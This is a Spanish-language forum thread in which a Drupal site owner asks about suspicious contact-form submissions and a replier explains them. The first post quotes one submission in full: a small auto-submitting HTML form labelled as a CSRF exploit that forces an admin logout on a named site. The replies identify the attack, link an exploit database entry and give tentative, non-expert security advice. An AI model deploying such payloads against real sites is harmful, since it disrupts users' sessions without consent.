[SOLUCIONADO] Correos sospechos me llegan...

#1 (**permalink**) 12/12/2013, 04:39

Hoy he abierto mi correo y me he encontrado este email y 2 mas de por el estilo.
Esto ha entrado por un formulario de contacto hecho con webform que es publico en mi web para todo el mundo.
¿Alguna pista de que es? ¿Un intento de hackear la web?

Código:

Submitted on Wednesday, December 11, 2013 - 14:47
Submitted by user: sup_admin
Submitted values are:

Your email: youcanreadthis@funny
Your website:
Your comment:
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to logout Admin</H2>
<form method="POST" name="form0" action="http://babemap.com/logout">
</form>
</body>
</html>

MarioAraque · #2 (**permalink**) 12/12/2013, 05:00

Es un exploit, para poder forzar el logout en tu web. Mientras no esté en tu código fuente no tenés de qué preocuparte.

Es una vulnerabilidad para Drupales viejos, de echo hasta en la 7.12 existe: http://www.exploit-db.com/exploits/18564/

Saludos.

#3 (**permalink**) 12/12/2013, 05:08

Me lo temia. Ademas iba acompañado de insultos varios. :)

que significa 'forzar el logout'?

MarioAraque · #4 (**permalink**) 12/12/2013, 05:24

Que te desloguea automáticamente el usuario que este logueado en tu web!

#5 (**permalink**) 12/12/2013, 05:36

Cita:

Mientras no esté en tu código fuente no tenés de qué preocuparte.

¿Para esto deberian poder entrar en mi FTP, verdad? o poder escribir archivos...

MarioAraque · #6 (**permalink**) 12/12/2013, 05:47

Bueno, no soy un experto en temas de seguridad, no puedo responderte con total seguridad. Pero si ves que te deslogueas constantemente o tenes alguna vulnerabilidad o comportamiento raro, vas a tener que migrar a Drupal 7.

#7 (**permalink**) 12/12/2013, 06:11

De momento todo va bien.